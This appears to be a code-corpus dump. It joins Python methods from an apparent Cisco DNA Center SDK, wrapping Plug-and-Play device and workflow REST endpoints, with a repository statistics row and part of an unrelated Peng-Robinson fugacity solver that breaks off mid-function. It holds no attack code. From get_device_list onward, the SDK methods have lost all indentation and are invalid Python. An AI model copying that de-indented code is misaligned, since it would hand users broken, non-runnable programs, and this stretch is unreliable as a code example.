        self._request_validator('jsd_9e857b5a4a0bbcdb_v1_3_3')\
            .validate(body)

    url = apply_path_params(
        '/dna/intent/api/v1/onboarding/pnp-device/reset', {})

    if headers:
        merged_headers = self._session.headers or {}
        merged_headers.update(dict_of_str(headers))
        json_data = self._session.post(url, params=query_params,
                                       json=body,
                                       headers=merged_headers)
    else:
        json_data = self._session.post(url, params=query_params,
                                       json=body)

    return self._object_factory('bpm_9e857b5a4a0bbcdb_v1_3_3', json_data)
def sync_virtual_account_devices(self,
                                 autoSyncPeriod=None,
                                 ccoUser=None,
                                 expiry=None,
                                 lastSync=None,
                                 profile=None,
                                 smartAccountId=None,
                                 syncResult=None,
                                 syncResultStr=None,
                                 syncStartTime=None,
                                 syncStatus=None,
                                 tenantId=None,
                                 token=None,
                                 virtualAccountId=None,
                                 headers=None,
                                 payload=None,
                                 active_validation=True,
                                 **request_parameters):
    """Sync device info from a smart/virtual account into the PnP
    database. The response payload returns a list of synced devices.

    Args:
        autoSyncPeriod(number): SAVAMapping's autoSyncPeriod.
        ccoUser(string): SAVAMapping's ccoUser.
        expiry(number): SAVAMapping's expiry.
        lastSync(number): SAVAMapping's lastSync.
        profile(object): SAVAMapping's profile.
        smartAccountId(string): SAVAMapping's smartAccountId.
        syncResult(object): SAVAMapping's syncResult.
        syncResultStr(string): SAVAMapping's syncResultStr.
        syncStartTime(number): SAVAMapping's syncStartTime.
        syncStatus(string): SAVAMapping's syncStatus. Available
            values are 'NOT_SYNCED', 'SYNCING', 'SUCCESS' and
            'FAILURE'.
        tenantId(string): SAVAMapping's tenantId.
        token(string): SAVAMapping's token.
        virtualAccountId(string): SAVAMapping's virtualAccountId.
        headers(dict): Dictionary of HTTP Headers to send with the
            Request.
        payload(dict): A JSON serializable Python object to send in the
            body of the Request.
        active_validation(bool): Enable/Disable payload validation.
            Defaults to True.
        **request_parameters: Additional request parameters (provides
            support for parameters that may be added in the future).

    Returns:
        MyDict: JSON response. Access the object's properties by using
        the dot notation or the bracket notation.

    Raises:
        TypeError: If the parameter types are incorrect.
        MalformedRequest: If the request body created is invalid.
        ApiError: If the DNA Center cloud returns an error.
    """
    check_type(headers, dict)
    check_type(payload, dict)
    if headers is not None:
        for hdr in ('Content-Type', 'X-Auth-Token'):
            if hdr in headers:
                check_type(headers.get(hdr), basestring,
                           may_be_none=False)

    query_params = dict_from_items_with_values(dict(request_parameters))

    body = {
        'autoSyncPeriod': autoSyncPeriod,
        'ccoUser': ccoUser,
        'expiry': expiry,
        'lastSync': lastSync,
        'profile': profile,
        'smartAccountId': smartAccountId,
        'syncResult': syncResult,
        'syncResultStr': syncResultStr,
        'syncStartTime': syncStartTime,
        'syncStatus': syncStatus,
        'tenantId': tenantId,
        'token': token,
        'virtualAccountId': virtualAccountId,
    }
    body.update(payload or {})
    body = dict_from_items_with_values(body)
    if active_validation:
        self._request_validator('jsd_a4b6c87a4ffb9efa_v1_3_3')\
            .validate(body)

    url = apply_path_params(
        '/dna/intent/api/v1/onboarding/pnp-device/vacct-sync', {})

    if headers:
        merged_headers = self._session.headers or {}
        merged_headers.update(dict_of_str(headers))
        json_data = self._session.post(url, params=query_params,
                                       json=body,
                                       headers=merged_headers)
    else:
        json_data = self._session.post(url, params=query_params,
                                       json=body)

    return self._object_factory('bpm_a4b6c87a4ffb9efa_v1_3_3', json_data)
def delete_workflow_by_id(self,
                          id,
                          headers=None,
                          **request_parameters):
    """Delete the PnP workflow matching the given id.

    Args:
        id(basestring): id path parameter.
        headers(dict): Dictionary of HTTP Headers to send with the
            Request.
        **request_parameters: Additional request parameters (provides
            support for parameters that may be added in the future).

    Returns:
        MyDict: JSON response. Access the object's properties by using
        the dot notation or the bracket notation.

    Raises:
        TypeError: If the parameter types are incorrect.
        MalformedRequest: If the request body created is invalid.
        ApiError: If the DNA Center cloud returns an error.
    """
    check_type(headers, dict)
    check_type(id, basestring, may_be_none=False)
    if headers is not None and 'X-Auth-Token' in headers:
        check_type(headers.get('X-Auth-Token'), basestring,
                   may_be_none=False)

    query_params = dict_from_items_with_values(dict(request_parameters))

    url = apply_path_params(
        '/dna/intent/api/v1/onboarding/pnp-workflow/${id}',
        {'id': id})

    if headers:
        merged_headers = self._session.headers or {}
        merged_headers.update(dict_of_str(headers))
        json_data = self._session.delete(url, params=query_params,
                                         headers=merged_headers)
    else:
        json_data = self._session.delete(url, params=query_params)

    return self._object_factory('bpm_af8d7b0e470b8ae2_v1_3_3', json_data)
def get_workflows(self,
                  limit=None,
                  name=None,
                  offset=None,
                  sort=None,
                  sort_order=None,
                  type=None,
                  headers=None,
                  **request_parameters):
    """Return the list of workflows matching the filter criteria.

    If a limit is not specified, the service defaults to returning 50
    workflows. Pagination and sorting are also supported by this
    endpoint.

    Args:
        limit(int): Limits number of results.
        offset(int): Index of first result.
        sort(basestring): Comma seperated lost of fields to sort on.
        sort_order(basestring): Sort Order Ascending (asc) or
            Descending (des).
        type(basestring): Workflow Type.
        name(basestring): Workflow Name.
        headers(dict): Dictionary of HTTP Headers to send with the
            Request.
        **request_parameters: Additional request parameters (provides
            support for parameters that may be added in the future).

    Returns:
        list: JSON response. A list of MyDict objects. Access the
        object's properties by using the dot notation or the bracket
        notation.

    Raises:
        TypeError: If the parameter types are incorrect.
        MalformedRequest: If the request body created is invalid.
        ApiError: If the DNA Center cloud returns an error.
    """
    check_type(headers, dict)
    check_type(limit, int)
    check_type(offset, int)
    check_type(sort, basestring)
    check_type(sort_order, basestring)
    check_type(type, basestring)
    check_type(name, basestring)
    if headers is not None and 'X-Auth-Token' in headers:
        check_type(headers.get('X-Auth-Token'), basestring,
                   may_be_none=False)

    query_params = {
        'limit': limit,
        'offset': offset,
        'sort': sort,
        'sortOrder': sort_order,  # API uses camelCase for this key
        'type': type,
        'name': name,
    }
    query_params.update(request_parameters)
    query_params = dict_from_items_with_values(query_params)

    url = apply_path_params(
        '/dna/intent/api/v1/onboarding/pnp-workflow', {})

    if headers:
        merged_headers = self._session.headers or {}
        merged_headers.update(dict_of_str(headers))
        json_data = self._session.get(url, params=query_params,
                                      headers=merged_headers)
    else:
        json_data = self._session.get(url, params=query_params)

    return self._object_factory('bpm_aeb4dad04a99bbe3_v1_3_3', json_data)
def preview_config(self,
                   deviceId=None,
                   siteId=None,
                   type=None,
                   headers=None,
                   payload=None,
                   active_validation=True,
                   **request_parameters):
    """Trigger a preview for site-based Day 0 Configuration.

    Args:
        deviceId(string): SiteProvisionRequest's deviceId.
        siteId(string): SiteProvisionRequest's siteId.
        type(string): SiteProvisionRequest's type. Available values
            are 'Default', 'AccessPoint', 'StackSwitch', 'Sensor' and
            'MobilityExpress'.
        headers(dict): Dictionary of HTTP Headers to send with the
            Request.
        payload(dict): A JSON serializable Python object to send in the
            body of the Request.
        active_validation(bool): Enable/Disable payload validation.
            Defaults to True.
        **request_parameters: Additional request parameters (provides
            support for parameters that may be added in the future).

    Returns:
        MyDict: JSON response. Access the object's properties by using
        the dot notation or the bracket notation.

    Raises:
        TypeError: If the parameter types are incorrect.
        MalformedRequest: If the request body created is invalid.
        ApiError: If the DNA Center cloud returns an error.
    """
    check_type(headers, dict)
    check_type(payload, dict)
    if headers is not None:
        for hdr in ('Content-Type', 'X-Auth-Token'):
            if hdr in headers:
                check_type(headers.get(hdr), basestring,
                           may_be_none=False)

    query_params = dict_from_items_with_values(dict(request_parameters))

    body = {
        'deviceId': deviceId,
        'siteId': siteId,
        'type': type,
    }
    body.update(payload or {})
    body = dict_from_items_with_values(body)
    if active_validation:
        self._request_validator('jsd_cf9418234d9ab37e_v1_3_3')\
            .validate(body)

    url = apply_path_params(
        '/dna/intent/api/v1/onboarding/pnp-device/site-config-'
        'preview', {})

    if headers:
        merged_headers = self._session.headers or {}
        merged_headers.update(dict_of_str(headers))
        json_data = self._session.post(url, params=query_params,
                                       json=body,
                                       headers=merged_headers)
    else:
        json_data = self._session.post(url, params=query_params,
                                       json=body)

    return self._object_factory('bpm_cf9418234d9ab37e_v1_3_3', json_data)
def get_device_by_id(self,
                     id,
                     headers=None,
                     **request_parameters):
    """Return the PnP device details for the given device id.

    Args:
        id(basestring): id path parameter.
        headers(dict): Dictionary of HTTP Headers to send with the
            Request.
        **request_parameters: Additional request parameters (provides
            support for parameters that may be added in the future).

    Returns:
        MyDict: JSON response. Access the object's properties by using
        the dot notation or the bracket notation.

    Raises:
        TypeError: If the parameter types are incorrect.
        MalformedRequest: If the request body created is invalid.
        ApiError: If the DNA Center cloud returns an error.
    """
    check_type(headers, dict)
    check_type(id, basestring, may_be_none=False)
    if headers is not None and 'X-Auth-Token' in headers:
        check_type(headers.get('X-Auth-Token'), basestring,
                   may_be_none=False)

    query_params = dict_from_items_with_values(dict(request_parameters))

    url = apply_path_params(
        '/dna/intent/api/v1/onboarding/pnp-device/${id}',
        {'id': id})

    if headers:
        merged_headers = self._session.headers or {}
        merged_headers.update(dict_of_str(headers))
        json_data = self._session.get(url, params=query_params,
                                      headers=merged_headers)
    else:
        json_data = self._session.get(url, params=query_params)

    return self._object_factory('bpm_bab6c9e5440885cc_v1_3_3', json_data)
def claim_device(self,
                 configFileUrl=None,
                 configId=None,
                 deviceClaimList=None,
                 fileServiceId=None,
                 imageId=None,
                 imageUrl=None,
                 populateInventory=None,
                 projectId=None,
                 workflowId=None,
                 headers=None,
                 payload=None,
                 active_validation=True,
                 **request_parameters):
    """Claim one or more devices with the specified workflow.

    Args:
        configFileUrl(string): ClaimDeviceRequest's configFileUrl.
        configId(string): ClaimDeviceRequest's configId.
        deviceClaimList(list): ClaimDeviceRequest's deviceClaimList
            (list of objects).
        fileServiceId(string): ClaimDeviceRequest's fileServiceId.
        imageId(string): ClaimDeviceRequest's imageId.
        imageUrl(string): ClaimDeviceRequest's imageUrl.
        populateInventory(boolean): ClaimDeviceRequest's
            populateInventory.
        projectId(string): ClaimDeviceRequest's projectId.
        workflowId(string): ClaimDeviceRequest's workflowId.
        headers(dict): Dictionary of HTTP Headers to send with the
            Request.
        payload(dict): A JSON serializable Python object to send in the
            body of the Request.
        active_validation(bool): Enable/Disable payload validation.
            Defaults to True.
        **request_parameters: Additional request parameters (provides
            support for parameters that may be added in the future).

    Returns:
        MyDict: JSON response. Access the object's properties by using
        the dot notation or the bracket notation.

    Raises:
        TypeError: If the parameter types are incorrect.
        MalformedRequest: If the request body created is invalid.
        ApiError: If the DNA Center cloud returns an error.
    """
    check_type(headers, dict)
    check_type(payload, dict)
    if headers is not None:
        for hdr in ('Content-Type', 'X-Auth-Token'):
            if hdr in headers:
                check_type(headers.get(hdr), basestring,
                           may_be_none=False)

    query_params = dict_from_items_with_values(dict(request_parameters))

    body = {
        'configFileUrl': configFileUrl,
        'configId': configId,
        'deviceClaimList': deviceClaimList,
        'fileServiceId': fileServiceId,
        'imageId': imageId,
        'imageUrl': imageUrl,
        'populateInventory': populateInventory,
        'projectId': projectId,
        'workflowId': workflowId,
    }
    body.update(payload or {})
    body = dict_from_items_with_values(body)
    if active_validation:
        self._request_validator('jsd_d8a619974a8a8c48_v1_3_3')\
            .validate(body)

    url = apply_path_params(
        '/dna/intent/api/v1/onboarding/pnp-device/claim', {})

    if headers:
        merged_headers = self._session.headers or {}
        merged_headers.update(dict_of_str(headers))
        json_data = self._session.post(url, params=query_params,
                                       json=body,
                                       headers=merged_headers)
    else:
        json_data = self._session.post(url, params=query_params,
                                       json=body)

    return self._object_factory('bpm_d8a619974a8a8c48_v1_3_3', json_data)
def delete_device_by_id_from_pnp(self,
                                 id,
                                 headers=None,
                                 **request_parameters):
    """Delete the specified device from the PnP database.

    Args:
        id(basestring): id path parameter.
        headers(dict): Dictionary of HTTP Headers to send with the
            Request.
        **request_parameters: Additional request parameters (provides
            support for parameters that may be added in the future).

    Returns:
        MyDict: JSON response. Access the object's properties by using
        the dot notation or the bracket notation.

    Raises:
        TypeError: If the parameter types are incorrect.
        MalformedRequest: If the request body created is invalid.
        ApiError: If the DNA Center cloud returns an error.
    """
    check_type(headers, dict)
    check_type(id, basestring, may_be_none=False)
    if headers is not None and 'X-Auth-Token' in headers:
        check_type(headers.get('X-Auth-Token'), basestring,
                   may_be_none=False)

    query_params = dict_from_items_with_values(dict(request_parameters))

    url = apply_path_params(
        '/dna/intent/api/v1/onboarding/pnp-device/${id}',
        {'id': id})

    if headers:
        merged_headers = self._session.headers or {}
        merged_headers.update(dict_of_str(headers))
        json_data = self._session.delete(url, params=query_params,
                                         headers=merged_headers)
    else:
        json_data = self._session.delete(url, params=query_params)

    return self._object_factory('bpm_cdab9b474899ae06_v1_3_3', json_data)
def get_device_list(self,
cm_state=None,
last_contact=None,
limit=None,
name=None,
offset=None,
onb_state=None,
pid=None,
project_id=None,
project_name=None,
serial_number=None,
smart_account_id=None,
sort=None,
sort_order=None,
source=None,
state=None,
virtual_account_id=None,
workflow_id=None,
workflow_name=None,
headers=None,
**request_parameters):
"""Returns list of devices based on filter crieteria. If a limit is
not specified, it will default to return 50 devices.
Pagination and sorting are also supported by this
endpoint.
Args:
limit(int): Limits number of results.
offset(int): Index of first result.
sort(basestring): Comma seperated list of fields to sort
on.
sort_order(basestring): Sort Order Ascending (asc) or
Descending (des).
serial_number(basestring): Device Serial Number.
state(basestring): Device State.
onb_state(basestring): Device Onboarding State.
cm_state(basestring): Device Connection Manager State.
name(basestring): Device Name.
pid(basestring): Device ProductId.
source(basestring): Device Source.
project_id(basestring): Device Project Id.
workflow_id(basestring): Device Workflow Id.
project_name(basestring): Device Project Name.
workflow_name(basestring): Device Workflow Name.
smart_account_id(basestring): Device Smart Account.
virtual_account_id(basestring): Device Virtual Account.
last_contact(bool): Device Has Contacted lastContact >
0.
headers(dict): Dictionary of HTTP Headers to send with the Request
.
**request_parameters: Additional request parameters (provides
support for parameters that may be added in the future).
Returns:
MyDict: JSON response. Access the object's properties by using
the dot notation or the bracket notation.
Raises:
TypeError: If the parameter types are incorrect.
MalformedRequest: If the request body created is invalid.
ApiError: If the DNA Center cloud returns an error.
"""
check_type(headers, dict)
check_type(limit, int)
check_type(offset, int)
check_type(sort, basestring)
check_type(sort_order, basestring)
check_type(serial_number, basestring)
check_type(state, basestring)
check_type(onb_state, basestring)
check_type(cm_state, basestring)
check_type(name, basestring)
check_type(pid, basestring)
check_type(source, basestring)
check_type(project_id, basestring)
check_type(workflow_id, basestring)
check_type(project_name, basestring)
check_type(workflow_name, basestring)
check_type(smart_account_id, basestring)
check_type(virtual_account_id, basestring)
check_type(last_contact, bool)
if headers is not None:
if 'X-Auth-Token' in headers:
check_type(headers.get('X-Auth-Token'),
basestring, may_be_none=False)
params = {
'limit':
limit,
'offset':
offset,
'sort':
sort,
'sortOrder':
sort_order,
'serialNumber':
serial_number,
'state':
state,
'onbState':
onb_state,
'cmState':
cm_state,
'name':
name,
'pid':
pid,
'source':
source,
'projectId':
project_id,
'workflowId':
workflow_id,
'projectName':
project_name,
'workflowName':
workflow_name,
'smartAccountId':
smart_account_id,
'virtualAccountId':
virtual_account_id,
'lastContact':
last_contact,
}
params.update(request_parameters)
params = dict_from_items_with_values(params)
path_params = {
}
with_custom_headers = False
_headers = self._session.headers or {}
if headers:
_headers.update(dict_of_str(headers))
with_custom_headers = True
e_url = ('/dna/intent/api/v1/onboarding/pnp-device')
endpoint_full_url = apply_path_params(e_url, path_params)
if with_custom_headers:
json_data = self._session.get(endpoint_full_url, params=params,
headers=_headers)
else:
json_data = self._session.get(endpoint_full_url, params=params)
return self._object_factory('bpm_e6b3db8046c99654_v1_3_3', json_data)
def add_device(self,
_id=None,
deviceInfo=None,
runSummaryList=None,
systemResetWorkflow=None,
systemWorkflow=None,
tenantId=None,
version=None,
workflow=None,
workflowParameters=None,
headers=None,
payload=None,
active_validation=True,
**request_parameters):
"""Adds a device to the PnP database.
Args:
_id(string): Device's _id.
deviceInfo(object): Device's deviceInfo.
runSummaryList(list): Device's runSummaryList (list of
objects).
systemResetWorkflow(object): Device's
systemResetWorkflow.
systemWorkflow(object): Device's systemWorkflow.
tenantId(string): Device's tenantId.
version(number): Device's version.
workflow(object): Device's workflow.
workflowParameters(object): Device's workflowParameters.
headers(dict): Dictionary of HTTP Headers to send with the Request
.
payload(dict): A JSON serializable Python object to send in the
body of the Request.
active_validation(bool): Enable/Disable payload validation.
Defaults to True.
**request_parameters: Additional request parameters (provides
support for parameters that may be added in the future).
Returns:
MyDict: JSON response. Access the object's properties by using
the dot notation or the bracket notation.
Raises:
TypeError: If the parameter types are incorrect.
MalformedRequest: If the request body created is invalid.
ApiError: If the DNA Center cloud returns an error.
"""
check_type(headers, dict)
check_type(payload, dict)
if headers is not None:
if 'Content-Type' in headers:
check_type(headers.get('Content-Type'),
basestring, may_be_none=False)
if 'X-Auth-Token' in headers:
check_type(headers.get('X-Auth-Token'),
basestring, may_be_none=False)
params = {
}
params.update(request_parameters)
params = dict_from_items_with_values(params)
path_params = {
}
_payload = {
'_id':
_id,
'deviceInfo':
deviceInfo,
'runSummaryList':
runSummaryList,
'systemResetWorkflow':
systemResetWorkflow,
'systemWorkflow':
systemWorkflow,
'tenantId':
tenantId,
'version':
version,
'workflow':
workflow,
'workflowParameters':
workflowParameters,
}
_payload.update(payload or {})
_payload = dict_from_items_with_values(_payload)
if active_validation:
self._request_validator('jsd_f3b26b5544cabab9_v1_3_3')\
.validate(_payload)
with_custom_headers = False
_headers = self._session.headers or {}
if headers:
_headers.update(dict_of_str(headers))
with_custom_headers = True
e_url = ('/dna/intent/api/v1/onboarding/pnp-device')
endpoint_full_url = apply_path_params(e_url, path_params)
if with_custom_headers:
json_data = self._session.post(endpoint_full_url, params=params,
json=_payload,
headers=_headers)
else:
json_data = self._session.post(endpoint_full_url, params=params,
json=_payload)
return self._object_factory('bpm_f3b26b5544cabab9_v1_3_3', json_data)
def get_device_count(self,
cm_state=None,
last_contact=None,
name=None,
onb_state=None,
pid=None,
project_id=None,
project_name=None,
serial_number=None,
smart_account_id=None,
source=None,
state=None,
virtual_account_id=None,
workflow_id=None,
workflow_name=None,
headers=None,
**request_parameters):
"""Returns the device count based on filter criteria. This is
useful for pagination.
Args:
serial_number(basestring): Device Serial Number.
state(basestring): Device State.
onb_state(basestring): Device Onboarding State.
cm_state(basestring): Device Connection Manager State.
name(basestring): Device Name.
pid(basestring): Device ProductId.
source(basestring): Device Source.
project_id(basestring): Device Project Id.
workflow_id(basestring): Device Workflow Id.
project_name(basestring): Device Project Name.
workflow_name(basestring): Device Workflow Name.
smart_account_id(basestring): Device Smart Account.
virtual_account_id(basestring): Device Virtual Account.
last_contact(bool): Device Has Contacted lastContact >
0.
headers(dict): Dictionary of HTTP Headers to send with the Request
.
**request_parameters: Additional request parameters (provides
support for parameters that may be added in the future).
Returns:
MyDict: JSON response. Access the object's properties by using
the dot notation or the bracket notation.
Raises:
TypeError: If the parameter types are incorrect.
MalformedRequest: If the request body created is invalid.
ApiError: If the DNA Center cloud returns an error.
"""
check_type(headers, dict)
check_type(serial_number, basestring)
check_type(state, basestring)
check_type(onb_state, basestring)
check_type(cm_state, basestring)
check_type(name, basestring)
check_type(pid, basestring)
check_type(source, basestring)
check_type(project_id, basestring)
check_type(workflow_id, basestring)
check_type(project_name, basestring)
check_type(workflow_name, basestring)
check_type(smart_account_id, basestring)
check_type(virtual_account_id, basestring)
check_type(last_contact, bool)
if headers is not None:
if 'X-Auth-Token' in headers:
check_type(headers.get('X-Auth-Token'),
basestring, may_be_none=False)
params = {
'serialNumber':
serial_number,
'state':
state,
'onbState':
onb_state,
'cmState':
cm_state,
'name':
name,
'pid':
pid,
'source':
source,
'projectId':
project_id,
'workflowId':
workflow_id,
'projectName':
project_name,
'workflowName':
workflow_name,
'smartAccountId':
smart_account_id,
'virtualAccountId':
virtual_account_id,
'lastContact':
last_contact,
}
params.update(request_parameters)
params = dict_from_items_with_values(params)
path_params = {
}
with_custom_headers = False
_headers = self._session.headers or {}
if headers:
_headers.update(dict_of_str(headers))
with_custom_headers = True
e_url = ('/dna/intent/api/v1/onboarding/pnp-device/count')
endpoint_full_url = apply_path_params(e_url, path_params)
if with_custom_headers:
json_data = self._session.get(endpoint_full_url, params=params,
headers=_headers)
else:
json_data = self._session.get(endpoint_full_url, params=params)
return self._object_factory('bpm_d9a1fa9c4068b23c_v1_3_3', json_data)
def get_device_history(self,
serial_number,
sort=None,
sort_order=None,
headers=None,
**request_parameters):
"""Returns history for a specific device. Serial number is a
required parameter.
Args:
serial_number(basestring): Device Serial Number.
sort(basestring): Comma seperated list of fields to sort
on.
sort_order(basestring): Sort Order Ascending (asc) or
Descending (des).
headers(dict): Dictionary of HTTP Headers to send with the Request
.
**request_parameters: Additional request parameters (provides
support for parameters that may be added in the future).
Returns:
MyDict: JSON response. Access the object's properties by using
the dot notation or the bracket notation.
Raises:
TypeError: If the parameter types are incorrect.
MalformedRequest: If the request body created is invalid.
ApiError: If the DNA Center cloud returns an error.
"""
check_type(headers, dict)
check_type(serial_number, basestring,
may_be_none=False)
check_type(sort, basestring)
check_type(sort_order, basestring)
if headers is not None:
if 'X-Auth-Token' in headers:
check_type(headers.get('X-Auth-Token'),
basestring, may_be_none=False)
params = {
'serialNumber':
serial_number,
'sort':
sort,
'sortOrder':
sort_order,
}
params.update(request_parameters)
params = dict_from_items_with_values(params)
path_params = {
}
with_custom_headers = False
_headers = self._session.headers or {}
if headers:
_headers.update(dict_of_str(headers))
with_custom_headers = True
e_url = ('/dna/intent/api/v1/onboarding/pnp-device/history')
endpoint_full_url = apply_path_params(e_url, path_params)
if with_custom_headers:
json_data = self._session.get(endpoint_full_url, params=params,
headers=_headers)
else:
json_data = self._session.get(endpoint_full_url, params=params)
return self._object_factory('bpm_f09319674049a7d4_v1_3_3', json_data)
| 38.185731 | 78 | 0.543181 | 9,484 | 98,481 | 5.436208 | 0.046394 | 0.024264 | 0.027698 | 0.020637 | 0.896328 | 0.893671 | 0.883197 | 0.871754 | 0.861454 | 0.852726 | 0 | 0.009811 | 0.389364 | 98,481 | 2,578 | 79 | 38.200543 | 0.847529 | 0.313644 | 0 | 0.861058 | 0 | 0 | 0.081329 | 0.040148 | 0 | 0 | 0 | 0 | 0 | 1 | 0.018483 | false | 0 | 0.005099 | 0 | 0.042065 | 0.000637 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
7c662b0152c5b35f775822bd429355bb1f262ff8 | 54,648 | py | Python | VLE/engine/methods/fug_methods.py | burakplt/Django-Chemical_Engineering- | ac84f450198abd865e7bd874d85d991f187efe7f | [
"MIT"
] | 2 | 2020-05-12T23:08:02.000Z | 2020-05-15T02:09:55.000Z | VLE/engine/methods/fug_methods.py | burakplt/Django-Chemical_Engineering- | ac84f450198abd865e7bd874d85d991f187efe7f | [
"MIT"
] | 4 | 2021-03-30T13:19:26.000Z | 2021-06-10T19:11:12.000Z | VLE/engine/methods/fug_methods.py | burakplt/Django-Chemical_Engineering- | ac84f450198abd865e7bd874d85d991f187efe7f | [
"MIT"
] | 1 | 2020-05-21T10:38:48.000Z | 2020-05-21T10:38:48.000Z | from math import exp, sqrt, log
from numpy import roots as np_roots
from ..chemsep_operation import EosInterface as dbcall
from chemeasy.settings import BASE_DIR
MODELS_URL = BASE_DIR+"/VLE/engine/Models/"
class PR76():
    def phi_vapor(components, temp, pressure, fractions, kij_input=None, kij_tune=None):
        """Peng-Robinson (1976) EOS solver: vapor-phase fugacity coefficients.

        Args:
            components: sequence of chemicals exposing string attributes
                AcentricityFactor, CriticalTemperature [K], CriticalPressure
                [Pa] and CriticalVolume [m^3/mol].
            temp: system temperature [K].
            pressure: system pressure [Pa].
            fractions: vapor-phase mole fractions, same order as components.
            kij_input: optional dict {(i, j): kij} of binary interaction
                parameters; values with |kij| >= 0.3 are rejected (treated
                as 0). Missing pairs are mirrored from the (j, i) entry.
            kij_tune: optional dict {(i, j): tune} exponent used to estimate
                kij from critical volumes when kij_input is not given.

        Returns:
            (phi, kijs): list of vapor fugacity coefficients (one per
            component) and the dict of kij values actually used.
        """
        cs = components
        T = temp       # K
        P = pressure   # Pa
        R = 8.314462   # universal gas constant, J/(mol K)
        y = fractions
        n = len(cs)

        def calculate_a(component, T):
            """PR a(T) [Pa m^6/mol^2] for a pure component."""
            w = float(component.AcentricityFactor)
            Tc = float(component.CriticalTemperature)
            Pc = float(component.CriticalPressure)
            Tr = T / Tc
            kappa = 0.37464 + 1.54226 * w - 0.26992 * w ** 2  # PR76 kappa
            c = 0.45724 * (R ** 2) * (Tc ** 2) / Pc
            alfaT = (1 + kappa * (1 - Tr ** 0.5)) ** 2
            return c * alfaT

        def calculate_b(component):
            """PR co-volume b [m^3/mol] for a pure component."""
            Tc = float(component.CriticalTemperature)
            Pc = float(component.CriticalPressure)
            return (0.07780 * R * Tc) / Pc

        kijs = {}
        if kij_input is None:
            def calculate_kij(c1, c2, tune):
                """Estimate kij from critical volumes (default tune 1.2)."""
                Vc1 = float(c1.CriticalVolume)
                Vc2 = float(c2.CriticalVolume)
                return 1 - (2 * sqrt((Vc1 ** 0.333) * (Vc2 ** 0.333))
                            / (Vc1 ** 0.333 + Vc2 ** 0.333)) ** tune
            if kij_tune is not None:
                for i in range(n):
                    for j in range(n):
                        if i == j:
                            kijs[(i, j)] = 0
                        elif kij_tune.get((i, j)) is not None:
                            kijs[(i, j)] = calculate_kij(cs[i], cs[j], kij_tune[(i, j)])
                # BUGFIX: mirror in a second pass so a tune supplied only as
                # (j, i) no longer raises KeyError; untouched pairs default to 0.
                for i in range(n):
                    for j in range(n):
                        if (i, j) not in kijs:
                            kijs[(i, j)] = kijs.get((j, i), 0)
            else:
                for i in range(n):
                    for j in range(n):
                        kijs[(i, j)] = calculate_kij(cs[i], cs[j], 1.2)
        else:
            for i in range(n):
                for j in range(n):
                    if i == j:
                        kijs[(i, j)] = 0
                    elif kij_input.get((i, j)) is not None:
                        # Reject implausibly large parameters (|kij| >= 0.3).
                        v = kij_input[(i, j)]
                        kijs[(i, j)] = v if abs(v) < 0.3 else 0
            # BUGFIX: mirror after the fill (see kij_tune branch above).
            for i in range(n):
                for j in range(n):
                    if (i, j) not in kijs:
                        kijs[(i, j)] = kijs.get((j, i), 0)

        def calculate_amix(y, T):
            """Van der Waals one-fluid mixing rule for a(T)."""
            amix = 0
            for i in range(n):
                for j in range(n):
                    ai = calculate_a(cs[i], T)
                    aj = calculate_a(cs[j], T)
                    amix += y[i] * y[j] * sqrt(ai * aj) * (1 - kijs[(i, j)])
            return amix

        def calculate_bmix(y):
            """Linear mixing rule for b."""
            return sum(y[i] * calculate_b(cs[i]) for i in range(n))

        def calculate_A(a, T):
            """Dimensionless A for a pure-component a or amix."""
            return a * P / (R ** 2) / (T ** 2)

        def calculate_B(b, T):
            """Dimensionless B for a pure-component b or bmix."""
            return b * P / (R * T)

        def calculate_Z(A, B, T):
            """Largest real root of the PR cubic -> vapor compressibility.

            BUGFIX: numpy.roots returns complex roots when the cubic has
            only one real solution; max() on those leaks a complex Z into
            log/exp below.  Select the largest (near-)real root instead.
            """
            coefficients = [1, B - 1, A - 2 * B - 3 * B ** 2, B ** 2 + 2 * B - A * B]
            real_roots = [r.real for r in np_roots(coefficients) if abs(r.imag) < 1e-9]
            return max(real_roots)

        amix = calculate_amix(y, T)
        bmix = calculate_bmix(y)
        A = calculate_A(amix, T)
        B = calculate_B(bmix, T)
        Z = calculate_Z(A, B, T)

        def calculate_phi(i, T):
            """Vapor fugacity coefficient for component index i (PR form)."""
            comp = cs[i]
            b = calculate_b(comp)
            ak = 0  # sum_k y_k (1 - k_ki) sqrt(a_k a_i)
            for k in range(n):
                ak += y[k] * (1 - kijs[(k, i)]) * sqrt(calculate_a(cs[k], T) * calculate_a(comp, T))
            lnphi = (b * (Z - 1) / bmix - log(Z - B)
                     - A / (sqrt(8) * B) * (2 * ak / amix - b / bmix)
                     * log((Z + 2.414 * B) / (Z - 0.414 * B)))
            return exp(lnphi)

        return [calculate_phi(i, T) for i in range(n)], kijs
class PR78 ():
    def phi_vapor(components, temp, pressure, fractions, kij_input=None, kij_tune=None):
        """Peng-Robinson (1978) EOS solver: vapor-phase fugacity coefficients.

        Differs from PR76 by the revised constants (0.457235 / 0.077796) and
        an extended kappa correlation for heavy components (omega > 0.491).

        Args:
            components: sequence of chemicals exposing string attributes
                AcentricityFactor, CriticalTemperature [K], CriticalPressure
                [Pa] and CriticalVolume [m^3/mol].
            temp: system temperature [K].
            pressure: system pressure [Pa].
            fractions: vapor-phase mole fractions, same order as components.
            kij_input: optional dict {(i, j): kij}; |kij| >= 0.3 rejected.
            kij_tune: optional dict {(i, j): tune} for the kij estimate.

        Returns:
            (phi, kijs): fugacity-coefficient list and the kij dict used.
        """
        cs = components
        T = temp       # K
        P = pressure   # Pa
        R = 8.314462   # J/(mol K)
        y = fractions
        n = len(cs)

        def calculate_a(component, T):
            """PR78 a(T) [Pa m^6/mol^2] for a pure component."""
            w = float(component.AcentricityFactor)
            Tc = float(component.CriticalTemperature)
            Pc = float(component.CriticalPressure)
            Tr = T / Tc
            # BUGFIX: threshold is omega <= 0.491 (was 491, which made the
            # 1978 heavy-component correlation unreachable).
            if w <= 0.491:
                kappa = 0.37464 + 1.54226 * w - 0.26992 * w ** 2
            else:
                kappa = 0.379642 + 1.48503 * w - 0.164423 * w ** 2 + 0.016666 * w ** 3
            c = 0.457235 * (R ** 2) * (Tc ** 2) / Pc
            alfaT = (1 + kappa * (1 - Tr ** 0.5)) ** 2
            return c * alfaT

        def calculate_b(component):
